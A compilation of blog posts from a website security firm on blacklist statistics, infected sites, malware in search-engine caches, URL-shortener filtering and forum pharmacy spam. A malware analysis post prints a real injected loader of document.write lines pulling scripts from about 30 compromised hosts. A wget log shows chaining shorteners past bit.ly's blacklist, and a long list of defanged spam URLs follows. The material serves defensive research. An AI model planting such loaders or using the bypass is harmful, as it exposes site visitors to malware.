Motivation
Understanding the behavior of infected websites is very important. This provides security researchers with strategies to help deal a blow to the bad guys and at the same time, provide website owners and administrators an idea of the current state of website security.

Since the publication of our last article in this series, we have received good feedback from our colleagues in security. We will attempt to incorporate their comments and concerns in this part of the series.

Methodology
We discussed the aim of this experiment and methodology in the last part of this series. We won’t repeat them here, but we encourage you to take a look at our first article in this series if you haven’t already read it!

Analysis
Below we present some graphs which provide more information about the analysis.

• Websites have a high probability of getting hacked on a Wednesday!

Websites have a high probability of getting hacked on a Wednesday!

• Websites have a high probability of getting hacked between 7-8 PM PDT.

Websites have a high probability of getting hacked between 7-8 PM PDT.

• On Monday websites get hacked most between 11 AM to 12 Noon, PDT
• On Tuesday websites get hacked most between 9 AM to 10 AM, PDT
• On Wednesday websites get hacked most between 7 PM to 8 PM, PDT
• On Thursday websites get hacked most between 10 PM to 11 PM, PDT
• On Friday websites get hacked most between 11 AM to 12 Noon, PDT
• On Saturday websites get hacked most between 1 PM to 2 PM, PDT
• On Sunday websites get hacked most between 11 AM to 12 Noon, PDT

Note: Most hashes which stay on the blacklist (over the 113 day period) seem to get added to the blacklist on Wednesday.

Conclusions
We have presented more interesting statistics regarding the appearance of website hashes on the Google Safe Browsing List. These statistics provide information which website administrators and owners can use better arm themselves with against attackers. We will continue analyzing the dataset to provide more interesting information. If you have any questions please add a comment.

At stopthehacker.com, we work hard to help you combat malicious hackers. If you would like to work with us, please drop us an email. You can also visit our services page to find out how we can help you, in fact you can even sign up for free services!

Till next time…

Motivation
In this article we will be analyzing the Google malware hash lists that have been published over the past few months in order to answer these important questions:

• How many websites get blacklisted each day?
• How many websites manage to get off the blacklist?
• How soon do websites get off the blacklist?
• How many never get off the blacklist?

These are practical questions which are often posed by frustrated, sometimes confused and angry website owners, time and time again at help forums, and via our contact page.

Resources
Google has done a good job creating detailed help content describing the process of blacklisting, as well as a group where website owners can ask for help. Additionally there are excellent resources like BadwareBusters where users can find volunteers to help them. We also participate in these groups.

Yet, there is still a demand for getting clear cut answers to some basic questions like the ones detailed above. In this vein we want to provide scientifically sound and statistically significant analysis of freely available information to provide clear answers to these questions. A small FAQ is also available on our site to answer questions from website owners and admins.

Goals
This series of experiments is split into multiple parts. This article presents a first look (part 1) at openly available data. The goal of the experiment is to understand:

• How many websites get blacklisted each day?
• How many websites manage to get off the blacklist?
• How soon do websites get off the blacklist?
• How many never get off the blacklist?
• How many websites fall back onto the blacklist?
• How much time elapses before a website falls back into the blacklist?

Methodology
For the purposes of this experiment, Google malware hash lists were collected from March 3, 2010 to June 1, 2010 (113 days). Malware hash lists were collected every 30 minutes. Each malware hash list contains the information in the Google malware hash specification. All hash lists were parsed and unique hashes were extracted and time stamped, and correlated with the malware hash list version.

Subsequently an analysis was conducted to answer the questions posed above. At no point was an attempt identify a website name from the hashes. Also, note that a single website can have more than one unique hash. For example: “www.abcd.com”, “abcd.com”, and “www.abcd.com/infected/” can all generate different hashes.

Brief Highlights

• Total number of unique hashes tracked: 688,602.
• Average number of unique hashes per day (over 113 day period): 6093.
• 25.8% of hashes never got off the Google blacklist.
  Each one of these unique hashes was deemed infected for over 3 months (greater than 113 days).
• 43% of hashes were listed exactly once as infected and managed to get off the Google blacklist.
  The average time each of these hashes was blacklisted was 13 days (89 days max).
• 2% of hashes were blacklisted exactly twice.
  Each one of these hashes was blacklisted, was then removed from the blacklist and then fell back in (the sites were hacked again). These sites remained infected for an average of 19 days (89 days max), and remained clean for an average of 17 days before being hacked again.

Analysis
It is clear from these initial results that a very large number of websites, nearly one quarter of the 6000 hashes added per day never make it off the Google blacklist. There are a number of reasons for this. One being that most webmasters, who may be good at website design and layouts, may not have the technical skills which are required to clean websites infected by malware and code injection attacks. We have also met website owners who are extremely business savvy, but lack the technical expertise to recover from a blacklisting event. The income lost due to business interruption in these cases is considerable.

We see that 43% of websites which get blacklisted manage to make it off the blacklist, but these websites suffer for an average period of 13 days.

Some websites manage to get off the blacklist and then fall in again. The average time for these “repeat offenders” on the blacklist is larger than the previous case. The time for which these “repeat offenders” stay clean is not very high, an average of just 17 days.

Conclusion
These numbers clearly show the current sorry state of website security. It is unfortunate that thousands of websites are affected every day. At stopthehacker.com, we strive to help combat this trend.  These issues need to be addressed specifically by services that currently are not readily available to the masses. To address this vacuum in the service space, and disrupt the security market stopthehacker.com provides its advanced Health Monitoring and Vulnerability assessment services for website owners. Our services take away the anguish which business owners face when their websites are attacked. Please visit our services page to find out how we can help you. In fact, you can even sign up for free services.

Further detailed analysis will be presented in the second part of this series. We will show detailed analysis of the data and will provide more insight on the implications of these observations.

Stay tuned for Part 2!

Overview

This post will show an example of a trend about which we first blogged a few months ago. We will concentrate on the way hackers use “backup-sources” to infect visitors to a compromised website. If this does not make sense yet, hold on for just a few seconds more.

Quite recently we blogged about how hackers are using benign and useful JavaScript hosted locally on accounts managed by the website owner/admin to spread malware. Hackers have injected malicious code right into useful snippets of JavaScript which do everything from displaying menu buttons, drop down choices and much much more. Take a look at our previous findings: here.

An Example

Everyday we find websites which are infected with malicious code which follows the same principles. In fact, we now monitor over 1 million websites!

Website name: ipac-bd.org
Time of latest scan: 15:33:10 PDT on 2010/05/03

In this example, the website was hosting JavaScript which had been compromised by a hacker. The hacker had inserted various script elements at the very end of the benign JavaScript being used by the website. It’s likely that the website owner never saw this coming, and probably did not realize what was going on until he was blacklisted.

The “Backup” Strategy

Take a look at the example below: clearly the hacker used multiple websites which he has compromised as the “loading point” for the malicious payload injected as part of the benign JavaScript. It’s almost funny when one realizes the number of websites this hacker has used as backups for his malicious code.

In this example the hacker has used 30 different infected websites to try and load his malicious code. The frequency distribution of the infectious websites which the hacker has used to distribute his malware is present below. It seems that hackers understand the concept of a “backup-strategy” well. An interesting point to probe further would be to understand why the frequency distribution of the infected sites is the way it is.

Frequency distribution of infected websites used in the transmission of malware.

Example Code

element.style.top    = top + 'px';
element.style.left   = left + 'px';
element.style.height = element._originalHeight;
element.style.width  = element._originalWidth;
}
}

// Safari returns margins on body which is incorrect if the child is absolutely
// positioned.  For performance reasons, redefine Position.cumulativeOffset for
// KHTML/WebKit only.
if (/Konqueror|Safari|KHTML/.test(navigator.userAgent)) {
Position.cumulativeOffset = function(element) {
var valueT = 0, valueL = 0;
do {
valueT += element.offsetTop  || 0;
valueL += element.offsetLeft || 0;
if (element.offsetParent == document.body)
if (Element.getStyle(element, 'position') == 'absolute') break;

element = element.offsetParent;
} while (element);

return [valueL, valueT];
}
}
element.style.top    = top + 'px';
element.style.left   = left + 'px';
element.style.height = element._originalHeight;
element.style.width  = element._originalWidth;
}
}
document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
document.write('<script src=hxxp://kazaadownloadpro.com/images/info.php ></script>');
document.write('<script src=hxxp://mesalina.pl/logs/COPYRIGHT.php ></script>');
document.write('<script src=hxxp://mesalina.pl/logs/COPYRIGHT.php ></script>');
document.write('<script src=hxxp://mesalina.pl/logs/COPYRIGHT.php ></script>');
document.write('<script src=hxxp://mesalina.pl/logs/COPYRIGHT.php ></script>');
document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
document.write('<script src=hxxp://mariupol.com.ua/marso/inc_akcii.php ></script>');
document.write('<script src=hxxp://nzoz.org/css/paginacja.php ></script>');
document.write('<script src=hxxp://nzoz.org/css/paginacja.php ></script>');
document.write('<script src=hxxp://nzoz.org/css/paginacja.php ></script>');
document.write('<script src=hxxp://nzoz.org/css/paginacja.php ></script>');
document.write('<script src=hxxp://nzoz.org/css/paginacja.php ></script>');
document.write('<script src=hxxp://1-2-3security.com/images/products_housing.php ></script>');
document.write('<script src=hxxp://devinjarvis.com/modlogan/index.php ></script>');
document.write('<script src=hxxp://forumonly5.com/images/gifimg.php ></script>');
document.write('<script src=hxxp://balajidentalcare.com/images/gifimg.php ></script>');
document.write('<script src=hxxp://balajidentalcare.com/images/gifimg.php ></script>');
document.write('<script src=hxxp://balajidentalcare.com/images/gifimg.php ></script>');
document.write('<script src=hxxp://balajidentalcare.com/images/gifimg.php ></script>');
document.write('<script src=hxxp://balajidentalcare.com/images/gifimg.php ></script>');
document.write('<script src=hxxp://coimbatore4u.com/WAP/default.php ></script>');
document.write('<script src=hxxp://coimbatore4u.com/WAP/default.php ></script>');
document.write('<script src=hxxp://coimbatore4u.com/WAP/default.php ></script>');
document.write('<script src=hxxp://lovegunsan.kr/data_file/lovegimje/errimg.php ></script>');
document.write('<script src=hxxp://lovegunsan.kr/data_file/lovegimje/errimg.php ></script>');
document.write('<script src=hxxp://precilub.com/lang/favicon.php ></script>');
document.write('<script src=hxxp://potaz.truelife.com/files/SQLyogTunnelz.php ></script>');
document.write('<script src=hxxp://asterisk-e-services.com/server/faq.php ></script>');
document.write('<script src=hxxp://asterisk-e-services.com/server/faq.php ></script>');
document.write('<script src=hxxp://asterisk-e-services.com/server/faq.php ></script>');
document.write('<script src=hxxp://newlifecareplus.com/images/LeftBar.php ></script>');
document.write('<script src=hxxp://newlifecareplus.com/images/LeftBar.php ></script>');
document.write('<script src=hxxp://newlifecareplus.com/images/LeftBar.php ></script>');
document.write('<script src=hxxp://newlifecareplus.com/images/LeftBar.php ></script>');
document.write('<script src=hxxp://newlifecareplus.com/images/LeftBar.php ></script>');
document.write('<script src=hxxp://bad-credit-personal-loan.co.cc/css/config.php ></script>');
document.write('<script src=hxxp://bad-credit-personal-loan.co.cc/css/config.php ></script>');
document.write('<script src=hxxp://foot-jobss.co.cc/wp-includes/wp-config-sample.php ></script>');
document.write('<script src=hxxp://bollyqueens.com/hot/showtopad.php ></script>');
document.write('<script src=hxxp://bollyqueens.com/hot/showtopad.php ></script>');
document.write('<script src=hxxp://bollyqueens.com/hot/showtopad.php ></script>');
document.write('<script src=hxxp://bollyqueens.com/hot/showtopad.php ></script>');
document.write('<script src=hxxp://almos-agroliga.ru/agroaddress/woodwork.php ></script>');
document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
document.write('<script src=hxxp://xn--alpenwaldhtte-5ob.de/inc/anreise.php ></script>');
document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
document.write('<script src=hxxp://completecompliance.co.in/img/legislationSEP1.php ></script>');
document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
document.write('<script src=hxxp://paragonfumigation.com/images/contactus.php ></script>');
document.write('<script src=hxxp://jakojonevar.webphoto.ir/photos/restoreg.php ></script>');
document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
document.write('<script src=hxxp://aanm-vvrsrpolytechnic.ac.in/old/images/j909q/banner_2.php ></script>');
document.write('<script src=hxxp://eumentum.com/newtrans/page_home.php ></script>');
document.write('<script src=hxxp://eumentum.com/newtrans/page_home.php ></script>');
document.write('<script src=hxxp://eumentum.com/newtrans/page_home.php ></script>');
document.write('<script src=hxxp://eumentum.com/newtrans/page_home.php ></script>');
document.write('<script src=hxxp://golchinhamed.ir/cgi-bin/PARSICT.php ></script>');
document.write('<script src=hxxp://golchinhamed.ir/cgi-bin/PARSICT.php ></script>');
document.write('<script src=hxxp://golchinhamed.ir/cgi-bin/PARSICT.php ></script>');
document.write('<script src=hxxp://pracemladaboleslav.cz/wp-admin/license.php ></script>');
document.write('<script src=hxxp://travelgenerators.com/Images/Dubai.php ></script>');
document.write('<script src=hxxp://allocinema.net/wp-admin/wp-commentsrss2.php ></script>');
document.write('<script src=hxxp://pink-hippo-mannheim.alexander-ditz.de/images/web2dateftplog.php ></script>');
document.write('<script src=hxxp://pink-hippo-mannheim.alexander-ditz.de/images/web2dateftplog.php ></script>');
document.write('<script src=hxxp://pink-hippo-mannheim.alexander-ditz.de/images/web2dateftplog.php ></script>');

Unfortunately, the idea of page caching has not been implemented well. In fact, page caching has opened up new opportunities for malware. The primary problem being that, from a security perspective, when search engines cache copies of websites, they are storing any malware that is present on the site on their own infrastructure as well.

Hackers Exploit Search Engine Page Caches

Most large search engines use some kind of malware analysis to determine if a website is compromised or not. Google for example, has a well tuned system with high accuracy. In our meeting with the Google malware team, some months ago, we were glad to find that they were already aware of this problem. In the weeks following our interaction, cached copies of infected websites were no longer easily available via searches.

Not so long ago, we wrote an article about our efforts to alert Yahoo of the presence of malware in the cached versions of various web pages served up by their search engine. Our efforts were not successful, although the occurrence of malware in Yahoo cached pages seems to have gone down significantly. Perhaps our messages were not entirely ignored.

Recently, an article came up on ISC SANS discussing this very same issue.

Recently, we have found instances of Bing serving up malware in their cached pages. It seems that Bing’s malware detection methods are not able to reliably detect malware on cached web pages. This keeps Bing from securing cached pages which contain malware for its users. We have provided screen shots below as an example of the issue. In this particular case, the strain of malware found in Bing cached pages has been around since 2009.

Search Engines Ignore the Problem

Consider the case where a malicious individual deliberately infects a website with malware and Bing (or another search engine) indexes it. The malicious individual can then send out hyperlinks pointing to the cached web pages hosted by Bing. Any kind of “reputation-checking” for the cached link will confirm that the page is hosted by a reputable company, in this case, Bing (Microsoft). However, the malware will still be able to deliver its payload. Just in case you’re thinking, “my antivirus will protect me from the malware on the cached page,” you may like to read this article.

It is surprising to see that search engines like Bing, which claim to implement malware detection, cannot correctly determine if a cached copy of a web page hosts malware! In these cases, Bing ends up an excellent attack vector for malicious individual.

It remains to be seen if search engine companies will continue to serve up cached pages laced with malware at the same time as they are touting active scan and detection mechanisms. Let’s hope this article can get attention in the upper echelons of management at these large search giants and they start to pay attention to this problem.

Screen shots follow below:

• Reuters via Threat Level | Wired.com

Users were targeted via a vulnerability in Internet Explorer when they visited websites infected with the malware. Spanish authorities shutdown the Mariposa bot-net on December 23, 2009 although the details of what is being called the “largest cyber-raid to date” are just being released.

Infection Statistics:

• 190 countries
• 40 of the largest financial institutions
• 50% of 1,000 largest companies

Case in point:

• Google: goo.gl
• Microsoft: binged.it

These URL shortening services are godsend for Internet surfers tired of copying and pasting long, ugly looking, URLs. But hold on a minute! All is not hunky dory in URL Shortening Land.

Due to processes inherent to “URL Shortening,” the original URL an Internet surfer might like to shorten is, for all purposes, being obfuscated. Is this a problem? Yes. Why, you ask? Consider the fact that people, not even necessarily tech-savvy ones, have learned to double check the links present in their emails and on websites. They even have help from various browser plugins, but in general, users are smartening up. When these same people see “shortened” links, they have no way to make a judgment call on whether visiting the link is safe, or not. For example, you may recognize www.stopthehacker.com as being a benign, safe to visit link, but what about bit.ly/oJMrP or bit.ly/dc38ze?

Articles published from credible sources, like ISC SANS, show that URL shortening services, when compromised, can provide an excellent mechanism for malicious hackers to infect unsuspecting visitors. Criminals use these services to bypass Google’s Safe Browsing service, which is used by popular browsers.

To combat this growing menace, URL shortening services have partnered with security companies to identify malicious URLs and websites. Some of them even use the SURBL blacklists to identify if someone has tried to link to a malicious website.

This article attempts to identify the effectiveness of security measures put in place by the various URL shortening services.

This experiment answers the following questions:

• Do URL shortening services have any kind of security measures in place?
• How effective are these security measures?

The 25 URL shortening services evaluated in this article are listed below:

We compare 25 URL shortening services listed below. Each URL shortening service is analyzed to measure the effectiveness of their security measures. We use a two stage process to evaluate the security implemented by each service.

snipr.com
budurl.com
bit.ly
short.to
twurl.nl
chilp.it
fon.gs
ub0.cc
snurl.com
fwd4.me
short.ie
a.gd
hurl.ws
kl.am
to.ly
hex.io
tr.im
cli.gs
urlborg.com
is.gd
sn.im
ur1.ca
tweetburner.com
tinyurl.com
snipurl.com

Experiment methodology:

An initial corpus of 932 websites was obtained from Malware Patrol a well respected source of information about malware infected websites, which receives nearly 3,500,000 hits/month. This experiment was conducted between February 2nd and February 4th, 2010.

For each URL obtained from Malware Patrol, we attempt to create shortened URLs for each site domain and full URL using each of the 25 services.

We denote a service as Stage 1 Compliant if it appears to use a security service or blacklist to identify malicious domains and does not allow a user to create a shortened link to any infected domain. Does the URL shortening service allow a user to create a URL pointing to a malicious domain (e.g. http://www.badsite.dom)?

We denote a service as Stage 2 Compliant if it uses a security service or blacklist to identify malicious domains and does not allow a user to create a shortened link to any infected domain or malicious full URL hosted on that domain. Does the URL shortening service allow a user to create a URL pointing to a malicious link hosted on a malicious domain (e.g. http://www.badsite.dom/badfolder/badfile)?

We present the most interesting results in brief:

• Approximately 68% of URL shortening services were Stage 1 Compliant.
• Approximately 56% of URL shortening services were exclusively Stage 2 Compliant.
• Approximately 52% of URL shortening services were both Stage 1 Compliant and Stage 2 Compliant (see graph below).

Observations on specific URL shortening services:

• bit.ly seems to favor blocking malicious domains rather than specific links.
• fwd4.me, hurl.ws and urlborg.com seem to favor blocking malicious links rather than specific domains.
• bit.ly failed to qualify as Stage 2 Compliant due to 0.5% of tested URLs.
• fwd4.me failed to qualify as Stage 1 Compliant due to 9.8% of tested URLs.
• hurl.ws failed to qualify as Stage 1 Compliant due to 0.3% of tested URLs.
• urlborg.com failed to qualify as Stage 1 Compliant due to 0.3% of tested URLs.

Venn Diagram depicting URL filtering capabilities of URL shortening services. Only about half of the most popular URL shortening services are effective at blocking malicious URLs.

Stage 1 Compliant and Stage 2 Compliant services:

budurl.com
cli.gs
fon.gs
hex.io
is.gd
kl.am
sn.im
snipr.com
snipurl.com
snurl.com
to.ly
tr.im
ub0.cc

Deeper security issues remain:

It seems that popular services like bit.ly, which do try to use blacklists in order to prevent malicious hackers from using their services and pointing to bad websites, can still be easily fooled by chaining together shortened URLs created by another service. We have found that if a malicious user can create a shortened URL using a service that does not implement blacklist checks or is not effective, then a service like bit.ly can be tricked into redirecting the visitor via the malicious shortened URL to a malicious domain. Effectively, users can be redirected to a malicious site regardless of bit.ly performing all its checks. See the appendix for an example below (wget log).

Conclusion:

This limited experiment shows that URL shortening services have a long way to go before Internet users can trust them to deliver safe links. About half of the most popular URL shortening services seem to be somewhat effective at blocking access to well known malicious URLs that can be found on blacklists. It remains to be seen if these URL shortening services can improve and provide a safer web experience for their users.

Appendix

Wget log example:

In this example, a malicious link (hxxp://wywg.ccsfyb.cn/wywg/txer) has been shortened using ow.ly (hxxp://ow.ly/Zyv3). Then, this shortened URL is fed to bit.ly. The shortened bit.ly URL (hxxp://bit.ly/5s4YhP) is created successfully and blacklist checks are no longer effective.

$ wget -O demonstrate_bit.ly_exploit http://bit.ly/5s4YhP
--scrubbed--  http://bit.ly/5s4YhP
Resolving bit.ly... 168.143.174.29, 128.121.234.46, 128.121.254.129, ...
Connecting to bit.ly|168.143.174.29|:80... connected.
HTTP request sent, awaiting response... 301 Moved
Location: http://ow.ly/Zyv3 [following]
---scrubbed--  http://ow.ly/Zyv3
Resolving ow.ly... 75.101.155.42
Connecting to ow.ly|75.101.155.42|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://wywg.ccsfyb.cn/wywg/txer [following]
---scrubbed--  http://wywg.ccsfyb.cn/wywg/txer
Resolving wywg.ccsfyb.cn... 98.126.11.178
Connecting to wywg.ccsfyb.cn|98.126.11.178|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://wywg.ccsfyb.cn/wywg/txer/ [following]
---scrubbed--  http://wywg.ccsfyb.cn/wywg/txer/
Reusing existing connection to wywg.ccsfyb.cn:80.
HTTP request sent, awaiting response... 403 Forbidden
-scrubbed-- ERROR 403: Forbidden.

Hackers employ two basic techniques:

• Creating large numbers of users on forums. These accounts are then used to post spam on the message boards.
• Exploiting Web Application vulnerabilities in the software used to run the forum.

Approximately two weeks ago, Lenny Zeltser, from ISC SANS, posted an informative article about online pharmacy ads popping up on message boards. In this vein we have conducted a limited experiment with about 14,000 websites which contain spam announcing online pharmacies.

The aim of the experiment:

• What percentage of websites which advertise online pharmacies are message boards and Internet forums?
• What Web Applications, e.g. CMS packages, are used on the message boards that are compromised?

We believe this will provide us with a rough estimate of how focused are hackers toward using message boards and forums on the Internet to advertise spam. From another perspective, it will provide us some idea of how vulnerable websites are if it hosts a message board or forum from being abused by hackers.

Testing methodology:

We have used Google to mine the websites which contain certain keyword patterns such as “buy zocor online”, or “buy brand kamagra online” etc. Once the links suggested by Google were mined, each of the websites was tested against Google’s Safe Browsing List to determine if they had hosted malware (according to Google). Next, an analysis was done to determine if the link(s) mined from Google pointed to a forum or message board. This was done by identifying the presence of multiple strings inside a link. For example, if a link has the keywords “topic”, “view”, “thread” or similar keywords, including characters associated with dynamic page generation, it is probably hosting a message board or forum.

The test was conducted between January 21st and January 23rd, 2010.

Popular software packages installed on compromised forums and message boards.

We present the most interesting results below:

• 47.9% of websites displaying “online pharmacy” spam are message boards and forums.
• None of the websites advertising “online pharmacy” spam were listed on Google Safe Browsing List.
• 20.28% of forums displaying “online pharmacy” spam were using Jquery.
• 15.73% of forums displaying “online pharmacy” spam were using phpBB.
• 11.54% of forums displaying “online pharmacy” spam were using WordPress.
• 10.84 % of forums displaying “online pharmacy” spam were using Mootools.

These results and other software packages, helper-scripts, tracking-code are depicted in the graph presented above.

This small experiment shows that a high percentage of websites displaying online spam campaigns are message boards or forums. This indicates that there are many unsecured software installations and older software packages still in use which are often exploited by malicious individuals to post spam. Further, it seems that most sites which were hacked are using jQuery. This supports our previous observations regarding jQuery scripts being used to push malware to unsuspecting visitors.

Below we present some sample links which lead to “online pharmacy” spam ads:

We strongly suggest that you do not visit the below sites.

hxxp://agingparents.com/blog/wp-comments.php?id_comments=1041
hxxp://agnitech.net/forums/viewtopic.php?f=2&t=426
hxxp://altlingo.com/community/members/zocor+online+24q.aspx
hxxp://aslansin.com/members/zocor-package-insert-26i/default.aspx
hxxp://beanbol.com/purchase-zocor-(simvastatin)-40-mg.html
hxxp://beanbol.com/zocor-(simvastatin)-20-mg.html
hxxp://blog.firestats.cc/
hxxp://blog.firestats.cc/49
hxxp://blogs.bet.com/music/soundOff/about/?cp=13
hxxp://blogs.greenpeace.ca/?proto=713
hxxp://blogs.greenpeace.ca/?proto=715
hxxp://blogs.inquirer.net/happynest/2009/10/09/just-sing/
hxxp://boards.tx-outdoors.com/viewtopic.php?f=2&t=467
hxxp://buy-cheap-zocor.hi5.com/
hxxp://cheapzocor.com/
hxxp://cheapzocor.com/about/
hxxp://coilhouse.net/?deppsa=710
hxxp://coilhouse.net/?deppsa=715
hxxp://community.burton.com/members/zocor+interaction+10a.aspx
hxxp://en.netlog.com/clan/BuyZocorOnline
hxxp://en.netlog.com/clan/zocor
hxxp://eostrava.cz/post-80523-cheap-zocor/
hxxp://f5fest.com/?p=50
hxxp://fans.askaninja.com/profiles/blogs/buy-zocor-no-prescription-buy
hxxp://feedblogger.net/members/cost-zocor-68l.aspx
hxxp://foros.canaljuegos.com/index.php?topic=1067891.0
hxxp://foro.toplatino.net/viewtopic.php?f=3&t=17031
hxxp://forsale.oodle.com/view/buy-zocor-online-and-treat-the-cholesterol-problems/1763399272-seattle-wa/
hxxp://forum.asian-autoparts.eu/viewtopic.php?p=4234&sid=82d1fc8ea8bf7189150dda0674d1d9b0
hxxp://forum.atiz.com/index.php?topic=362.msg665;topicseen
hxxp://forum.autonews.fr/index.php?showtopic=43369&view=getlastpost
hxxp://forum.jiwang.org/index.php?showtopic=44638
hxxp://forum.lugarcerto.com.br/viewtopic.php?f=13&t=1022
hxxp://forum.ronatvan.com/index.php?action=printpage;topic=3171.0
hxxp://forum.ronatvan.com/index.php?topic=3171.0
hxxp://forums.solmetra.com/viewtopic.php?f=2&t=67911
hxxp://forums.solmetra.com/viewtopic.php?f=3&t=48102
hxxp://forum.tag-board.com/showthread.php?p=70359
hxxp://forum.tarad.com/index.php?action=printpage;topic=23901.0
hxxp://forum.vachealait.com/viewtopic.php?f=3&t=123806
hxxp://forum.vachealait.com/viewtopic.php?f=5&t=124103
hxxp://forum.vladimirmedvedev.com/index.php?topic=190.0
hxxp://forum.vortue.com/showthread.php?p=114540
hxxp://gallopinghillcaterers.com/?page=buy-online-zocor&f=1262906101
hxxp://gameinformer.com/blogs/members/b/buy_zocor_warnings_blog/archive/2009/12/18/buy-zocor-warnings-pu4.aspx
hxxp://gameinformer.com/members/zocor_2D00_online/default.aspx
hxxp://gfestival.com/?pages=157
hxxp://gfestival.com/?pages=65
hxxp://grabhot.com/index.php?topic=2537.0
hxxp://groups.adobe.com/posts/534b2ec31b
hxxp://harvardcitizen.com/?zine=1144
hxxp://harvardcitizen.com/?zine=4200
hxxp://historias.masoportunidades.com.ar/?page_navg=3879
hxxp://ibls.com/cs/members/zocor+pricing+44n.aspx
hxxp://identi.ca/andres250
hxxp://identi.ca/zachery328
hxxp://innfromthenight.com/forum/viewtopic.php?f=28&t=57971&p=60406
hxxp://jackpenate.com/forum/viewtopic.php?pid=16485
hxxp://leegibbons.com/formbuilder/web/pharmacy/zocor/p=tricor-zocor.html
hxxp://letterheadforemail.com/Zocor.html
hxxp://mabonline.net/tablets-zocor-(simvastatin)-5-mg.html
hxxp://mabonline.net/zocor-(simvastatin)-for-sale.html
hxxp://matadornetwork.com/
hxxp://my.superbasket.gr/viewtopic.php?f=4&t=1562&p=2139
hxxp://naturalpet-com.safepages.com/showthread.php?t=1071
hxxp://networking.bizjournals.com/Jonny2
hxxp://noprescriptiononlinepharmacy.ca/zocor.html
hxxp://pastebin.ca/1743811
hxxp://pornknight.com/zocor-depression-t14855.html
hxxp://posterous.com/people/37qTcxHC297r
hxxp://punkrock.org/buyzocoronline1075&v=comments
hxxp://ranahan.dephan.go.id/forum/viewtopic.php?f=2&t=6803
hxxp://responsiblemarketing.com/blog/?generic=3880
hxxp://room.vicman.net/viewtopic.php?f=2&t=147874
hxxp://room.vicman.net/viewtopic.php?f=4&t=147047
hxxp://technorati.com/blogs/zocorlinks.blogspot.com
hxxp://thebristolfestival.org/README.php?tbf=746
hxxp://theevonyforum.com/online-zocor-purchase-buy-cheap-zocor-t433.html?sid=c64462e6e1214d18ea22e365c76aa13d
hxxp://thisis50.ning.com/forum/topics/buy-zocor-from-a-usa-pharmacy
hxxp://tk-twk.nets.hk/viewtopic.php?f=42&t=11427
hxxp://tohanschik.ru/viewtopic.php?t=1380&view=previous&sid=5ccac30f7095c3421d89b8a3c16a23a4
hxxp://twit88.com/home/node/10289
hxxp://virb.com/rushots/posts/text/6881665
hxxp://visualstudiogallery.msdn.microsoft.com/it-IT/4ec90b81-93e4-4435-b627-4410e6028af9?persist=True
hxxp://webradiocharts.eu/forum/viewtopic.php?f=4&t=376
hxxp://wiki.pylonshq.com/display/~heetley/BUY+Zocor+LOWEST+prices+NOW
hxxp://wiki.pylonshq.com/display/~heetley/BUY+Zocor+LOWEST+prices+NOW?showComments=true&showCommentArea=true
hxxp://www.247-pharmacy.com/buy/zocor.php
hxxp://www.abbeyproperties.co.uk/config.php?set_user=1&s=1264
hxxp://www.abbeyproperties.co.uk/config.php?set_user=1&s=1996
hxxp://www.aldaracreamonline.co.uk/buy-zocor.htm
hxxp://www.antidepressantscheaper.com/
hxxp://www.aperitto.com/support/forum/12-emr-suite/511-meridian-two-bit-pharmacy-appraiser-it
hxxp://www.articlesbase.com/health-articles/online-pharmacy-offers-the-most-competitive-prices-on-zocor-869351.html
hxxp://www.atalasoft.de/cs/members/zocor+400+mg+53b.aspx
hxxp://www.avatarpress.com/2010/01/22/post-80540-buy-zocor/
hxxp://www.blogged.com/topics/zocor/
hxxp://www.bowlofcereal.net/viewtopic.php?f=5&t=99
hxxp://www.brbooks.co.uk/zocor-(simvastatin)-10-mg-free-shipping.html
hxxp://www.canadianhealthcaremall.net/drug-zocor123.shtml
hxxp://www.canamericaglobal.com/products/Zocor/20/
hxxp://www.chemistdirect.co.uk/zocor-simvastatin-10-mg-tablets_4_12038.html
hxxp://www.chemistdirect.co.uk/zocor-simvastatin-40-mg-tablets_4_12040.html
hxxp://www.chop.edu/forum/user/profile/12110.page
hxxp://www.clockworkpharmacy.com/zocor-heart-pro-tablets-10mg.html
hxxp://www.copykatchat.com/
